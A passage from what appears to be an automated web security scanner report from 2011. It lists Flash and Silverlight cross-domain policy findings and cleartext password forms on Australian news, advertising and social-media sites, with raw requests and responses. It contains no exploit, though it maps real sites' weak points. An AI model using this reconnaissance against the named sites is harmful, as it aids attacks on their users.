   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.62. http://traktr.news.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://traktr.news.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: traktr.news.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "cc310451c6a77f7196c6fd35deb86d9b:1278978661"
Last-Modified: Thu, 19 Nov 2009 00:18:12 GMT
Accept-Ranges: bytes
Content-Length: 1521
Content-Type: application/xml
Cache-Control: max-age=3600
Date: Wed, 07 Sep 2011 14:14:32 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain
...[SNIP]...
<allow-access-from domain="*.news.com.au"/>
   <allow-access-from domain="*.foxsports.com.au"/>
   <allow-access-from domain="*.perthnow.com.au"/>
   <allow-access-from domain="*.theaustralian.com.au"/>
   <allow-access-from domain="*.dailytelegraph.com.au"/>
   <allow-access-from domain="*.heraldsun.com.au"/>
   <allow-access-from domain="*.couriermail.com.au"/>
   <allow-access-from domain="*.adelaidenow.com.au"/>
   <allow-access-from domain="*.themercury.com.au"/>
   <allow-access-from domain="*.ntnews.com.au"/>
   <allow-access-from domain="*.roo.com"/>
   <allow-access-from domain="*.carsguide.com.au"/>
   <allow-access-from domain="*.tiser.com.au"/>
   <allow-access-from domain="*.vogue.com.au"/>
   <allow-access-from domain="*.newsdigitalmedia.com.au"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
   <allow-access-from domain="m.au.2mdn.net"/>
   <allow-access-from domain="m1.au.2mdn.net"/>
   <allow-access-from domain="m1.2mdn.net"/>
   <allow-access-from domain="m2.2mdn.net"/>
   <allow-access-from domain="m2.au.2mdn.net"/>
   <allow-access-from domain="67.228.97.188/flashcms"/>
   <allow-access-from domain="208.43.130.232/flashcms"/>
...[SNIP]...

3.63. http://webservice.theweather.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webservice.theweather.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: webservice.theweather.com.au
Proxy-Connection: keep-alive
Referer: http://media.perthnow.com.au/multimedia/weatherWidget/5dayForecast/nopromo/WeatherWidget_11.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 DAV/2
Last-Modified: Wed, 03 Nov 2010 10:08:36 GMT
ETag: "ad0004-b53-49423397b7100"
Accept-Ranges: bytes
Content-Length: 2899
Content-Type: application/xml
Cache-Control: max-age=274
Expires: Wed, 07 Sep 2011 14:19:37 GMT
Date: Wed, 07 Sep 2011 14:15:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.all4u.tv"/>
<allow-access-from domain="*.beneful.com.au"/>
<allow-access-from domain="*.nestle.com.au"/>
<allow-access-from domain="*.purina.com.au"/>
<allow-access-from domain="*.redant.com.au"/>
<allow-access-from domain="*.byredant.com.au"/>
<allow-access-from domain="*.soi.net.au"/>
<allow-access-from domain="*.theweather.com.au"/>
<allow-access-from domain="*.yates.co.nz"/>
<allow-access-from domain="*.yates.com.au"/>
<allow-access-from domain="*.bemoneyconfident.com"/>
<allow-access-from domain="*.discovertasmania.com.au"/>
<allow-access-from domain="*.vicsnow.com"/>
<allow-access-from domain="*.bwm.com.au"/>
<allow-access-from domain="*.perthnow.com.au"/>
<allow-access-from domain="*.frostdesign.com.au"/>
<allow-access-from domain="*.kakadu.com.au"/>
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlastrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.awardwinning.com.au"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.mydove.com.au"/>
<allow-access-from domain="*.mydove.co.nz"/>
<allow-access-from domain="*.news.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.foxsports.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.perthnow.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.theaustralian.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dailytelegraph.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.heraldsun.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.couriermail.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.adelaidenow.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.themercury.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.ntnews.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.roo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.carsguide.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.tiser.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vogue.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.newsdigitalmedia.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...

3.64. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.152.41
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

3.65. http://www.smh.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.smh.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.smh.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:51:53 GMT
ETag: "1459f09-558-48eb2c1c3cc40"
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:10 GMT
Content-Length: 1368
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.360video.com.au" />
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brisbanetimes.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.drive.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.fairfax.com.au"/>
<allow-access-from domain="*.panoramicvideo.com.au" />
<allow-access-from domain="*.theage.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.watoday.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...

3.66. http://www.watoday.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watoday.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.watoday.com.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 04:52:24 GMT
ETag: "4101b-539-48eb2c39cd200"
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 1337
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.360video.com.au" />
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.brisbanetimes.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.drive.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.panoramicvideo.com.au" />
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.theage.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...

3.67. http://www.wtp101.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wtp101.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:29 GMT
ETag: 1300113893320
LastModified: Mon, 14 Mar 2011 14:44:53 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 320
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
<allow-access-from domain="*.nieuwefabia.nl"/>
<allow-access-from domain="*.denieuwefabia.nl"/>
...[SNIP]...

3.68. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:06 GMT
Server: hi
Status: 200 OK
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Wed, 07 Sep 2011 14:45:06 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

3.69. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-rbc.bidder7.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:05 GMT
ETag: "d18105-116-4ab73f1504140"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 6 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Thu, 08 Sep 2011 14:14:17 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.2. http://feed.video.news.com.au/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://feed.video.news.com.au
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: feed.video.news.com.au

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 262
Last-Modified: Thu, 04 Aug 2011 11:13:54 GMT
Server: Jetty(6.1.19)
Date: Wed, 07 Sep 2011 14:14:53 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="*"/></allow-from><grant-to><resource path="/" include-subpaths="true
...[SNIP]...

4.3. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Thu, 08 Sep 2011 14:14:09 GMT
Content-Type: text/xml
Content-Length: 312
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

4.4. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:56:56 GMT
Expires: Wed, 07 Sep 2011 18:56:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69502

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.5. http://s1.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s1.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 07 Sep 2011 02:55:27 GMT
Expires: Thu, 08 Sep 2011 02:55:27 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 40800

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.6. http://secure-au.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:33 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 14 Sep 2011 14:14:33 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://www.abc.net.au/res/libraries/pluck/abc.pluck-1.latest.min.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /res/libraries/pluck/abc.pluck-1.latest.min.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /res/libraries/pluck/abc.pluck-1.latest.min.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 21 Feb 2011 00:41:45 GMT
ETag: "16545ae-6697-20d00440"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=6708
Expires: Wed, 07 Sep 2011 16:06:01 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 26263
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853269; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

var ABC=ABC?ABC:{};ABC.Pluck=function(g){function b(h,j,i){if(ABC.Debug&&typeof(console)!=="undefined"&&typeof(console.log)!=="undefined"){console.log("Namespace="+h+", Function="+j+":");console.log(i
...[SNIP]...
L)){j.referringURL=""}}if(v){t=h(v,"&","=");k(t.a,j.loggedInMsg,j.loginContainer);n(j)}else{if(j.autoLogout){n(j)}}}function e(t,u,y,w,x,v){if(!c(t+" #abc_pluck-login-form").length){c(t).append('\n\t\t<form id="abc_pluck-login-form" action="#" method="'+v+'">\n\t\t\t<fieldset>
...[SNIP]...
</label>\n\t\t\t\t<input type="password" id="abc_pluck-login-form-password" name="'+y+'" size="16" maxlength="16" value="" />\n\n\t\t\t\t<input type="hidden" id="abc_pluck-login-form-referrer" name="'+w+'" value="'+x+'" />
...[SNIP]...

5.2. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watoday.com.au
Path:   /wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html HTTP/1.1
Host: www.watoday.com.au
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1315422870964; k_visit=1; __utma=209218509.1580993531.1315422892.1315422892.1315422892.1; __utmb=209218509.1.10.1315422892; __utmc=209218509; __utmz=209218509.1315422892.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
X-Cnection: close
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 132525
Content-Type: text/html;charset=UTF-8
Date: Wed, 07 Sep 2011 14:20:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>
<form name="commentLoginForm" action="/action/membershipLoginAction" method="post" data-validatable="true" data-ajaxSubmit="true">
<fieldset>
...[SNIP]...
<input type="hidden" id="commentFrmPasswordLoginEncrypted" name="commentFrmPasswordLoginEncrypted"/>
